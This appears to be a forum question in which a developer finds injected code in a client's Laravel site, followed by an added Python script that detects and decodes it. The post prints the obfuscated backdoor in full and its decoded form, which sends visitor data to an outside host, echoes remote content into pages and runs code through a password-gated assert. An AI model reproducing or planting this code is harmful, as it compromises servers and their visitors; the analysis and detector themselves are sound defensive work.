New code added on server inside laravel framework

Published 2019-08-20 18:41

Question:

I was doing a project for a client. A few days after finishing and uploading it to the server, my client showed me errors occurring. When I checked the files I found an extra piece of code added in the CheckForMaintenanceMode.php file inside

vendor/laravel/framework/illuminate/foundation/http/middleware

which is

//###==###
error_reporting(0); 
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("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"));'));
//###==###

After some basic decoding I found the following code written

if (isset($ibv))
{
    echo $ibv;
}
else
{
    if(!empty($_COOKIE["client_check"]))die($_COOKIE["client_check"]);

    if(!isset($c_["HTTP_ACCEPT_CHARSET"]))
    {
        $temp = dirname(__FILE__)."/ch";$charset = file_get_contents($temp);
        if (!$charset  && !isset($_GET["charset"]))
        {
            $str = file_get_contents("http://".$_SERVER["HTTP_HOST"]."/?charset=1");
            if(preg_match("/windows-1251/i", $str))
            {
                $charset = "windows-1251";
            }
            elseif(preg_match("/utf-8/i", $str))
            {
                $charset = "utf-8";
            }
            else
            {
                $charset = "windows-1251";
            }
            $handle = fopen($temp, "w+");
            fwrite($handle, $charset);
            fclose($handle);
        }
        else
        {
            $charset = "utf-8";
        }
        $c0 = $charset;
    }
    else
    {
        $c0=$c_["HTTP_ACCEPT_CHARSET"];
    }
    if(function_exists("curl_init"))
    {
        $c1=curl_init("http://net-streamer.com/get.php?d=".urlencode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&u=".urlencode($_SERVER["HTTP_USER_AGENT"])."&c=".$c0."&i=1&ip=".$_SERVER["REMOTE_ADDR"]."&h=".md5("069a5edfc9e75c4abf03b0608636fe46".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"].$_SERVER["HTTP_USER_AGENT"].$c0."1"));
        curl_setopt($c1,42,false);
        curl_setopt($c1,19913,true);
        $ibv =  curl_exec($c1);
        curl_close($c1);
    }
    elseif(ini_get("allow_url_fopen")==1)
    {
        $ibv = file_get_contents("http://net-streamer.com/get.php?d=".urlencode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&u=".urlencode($_SERVER["HTTP_USER_AGENT"])."&c=".$c0."&i=1&ip=".$_SERVER["REMOTE_ADDR"]."&h=".md5("069a5edfc9e75c4abf03b0608636fe46".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"].$_SERVER["HTTP_USER_AGENT"].$c0."1"));
    }
    if (isset($ibv))
    {
        echo $ibv;
    }
    if(isset($_REQUEST["p"]) && $_REQUEST["p"] == "85bc6cfb")
    {
        @assert($_REQUEST["c"]);
    }

}

But I do not understand what it does and why it is there. I also saw the same type of code added inside public/index.php.

Can someone please tell me why it is added and what it does?
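An added example, not part of the original post: a static Python check for the wrapper shown in the question (the `//###==###` markers, the error-suppressed variable function call, and the `str_rot13` / `base64_decode` layering) that recovers the hidden PHP as text without executing it. The function names and the sample, whose encoded payload is only the harmless statement `echo 1;`, are constructed for illustration.

```python
import base64
import binascii
import codecs
import re

# Constructed sample: same wrapper shape as the injected block in the post,
# but the encoded payload is only the harmless PHP statement `echo 1;`.
SAMPLE = r'''<?php
//###==###
error_reporting(0);
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("MJAbolNkBj=="));'));
//###==###
'''

MARKED_BLOCK = re.compile(r"//###==###(.*?)//###==###", re.S)
ROT13_ARG = re.compile(r"str_rot13\(\s*'([^']*)'\s*\)")
B64_ARG = re.compile(r"base64_decode\(\s*\"([A-Za-z0-9+/=\s]*)\"\s*\)")


def find_indicators(source):
    """Return the names of the obfuscation traits seen in the post's sample."""
    hits = []
    if MARKED_BLOCK.search(source):
        hits.append("marker-delimited block")
    if re.search(r"@\s*\$\w+\s*\(", source):
        hits.append("error-suppressed variable function call")
    if "onfr64_qrpbqr" in source:  # rot13 of "base64_decode"
        hits.append("rot13-hidden base64_decode")
    return hits


def decode_layers(source):
    """Statically undo rot13 then base64; nothing is ever executed."""
    results = []
    for rot in ROT13_ARG.findall(source):
        layer1 = codecs.decode(rot, "rot13")  # -> eval(base64_decode("..."));
        for blob in B64_ARG.findall(layer1):
            try:
                raw = base64.b64decode("".join(blob.split()), validate=True)
            except (binascii.Error, ValueError):
                continue  # truncated or damaged blob: skip, do not guess
            results.append(raw.decode("utf-8", errors="replace"))
    return results


if __name__ == "__main__":
    print(find_indicators(SAMPLE), decode_layers(SAMPLE))
```

Running `find_indicators` over every file under `vendor/` and `public/` and comparing hits against a clean `composer install` of the same lock file shows which files were modified after deployment.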